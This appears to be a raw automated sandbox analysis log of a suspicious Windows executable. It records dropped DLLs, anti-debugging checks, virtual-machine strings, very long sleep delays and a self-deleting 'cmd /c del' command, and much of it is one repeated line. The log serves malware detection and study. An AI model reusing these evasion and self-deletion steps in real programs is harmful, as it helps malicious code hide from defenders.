Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess created: "C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exeJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeMemory allocated: 3790000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeMemory allocated: 3940000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeMemory allocated: 5940000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeWindow / User API: threadDelayed 7482Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeWindow / User API: threadDelayed 2297Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcr120[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp120[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Program Files (x86)\Everything\msvcp120.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Program Files (x86)\Everything\vcruntime140.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\zf_cef[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Program Files (x86)\Everything\msvcr120.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\msvcp140[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Program Files (x86)\Everything\zf_cef.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeDropped PE file which has not been started: C:\Program Files (x86)\Everything\msvcp140.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe TID: 3364Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005FEBE2 FindFirstFileExW,0_2_005FEBE2
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003A11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000CBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FMSFT_NetEventVmNetworkAdatper.cdxml
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003A11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000CBB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2387902133.0000000000CBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000C4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW'
Source: zf_cef.dll.0.drBinary or memory string: VMware, Inc.1
Source: zf_cef.dll.0.drBinary or memory string: VMware, Inc.0
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000CBB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003A11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
Source: zf_cef.dll.0.drBinary or memory string: noreply@vmware.com
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005F1241 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005F1241
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_006024C9 GetProcessHeap,0_2_006024C9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005F1241 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005F1241
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005EA517 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_005EA517
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005EA67A SetUnhandledExceptionFilter,0_2_005EA67A
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005EA962 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_005EA962
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exeJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005EA785 cpuid 0_2_005EA785
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00602090
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: GetLocaleInfoW,0_2_00602196
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0060226C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: EnumSystemLocalesW,0_2_005F86F0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_006018F7
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: EnumSystemLocalesW,0_2_00601BEE
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: EnumSystemLocalesW,0_2_00601BA3
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: GetLocaleInfoW,0_2_005F8C1C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: EnumSystemLocalesW,0_2_00601C89
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00601D14
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: GetLocaleInfoW,0_2_00601F67
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
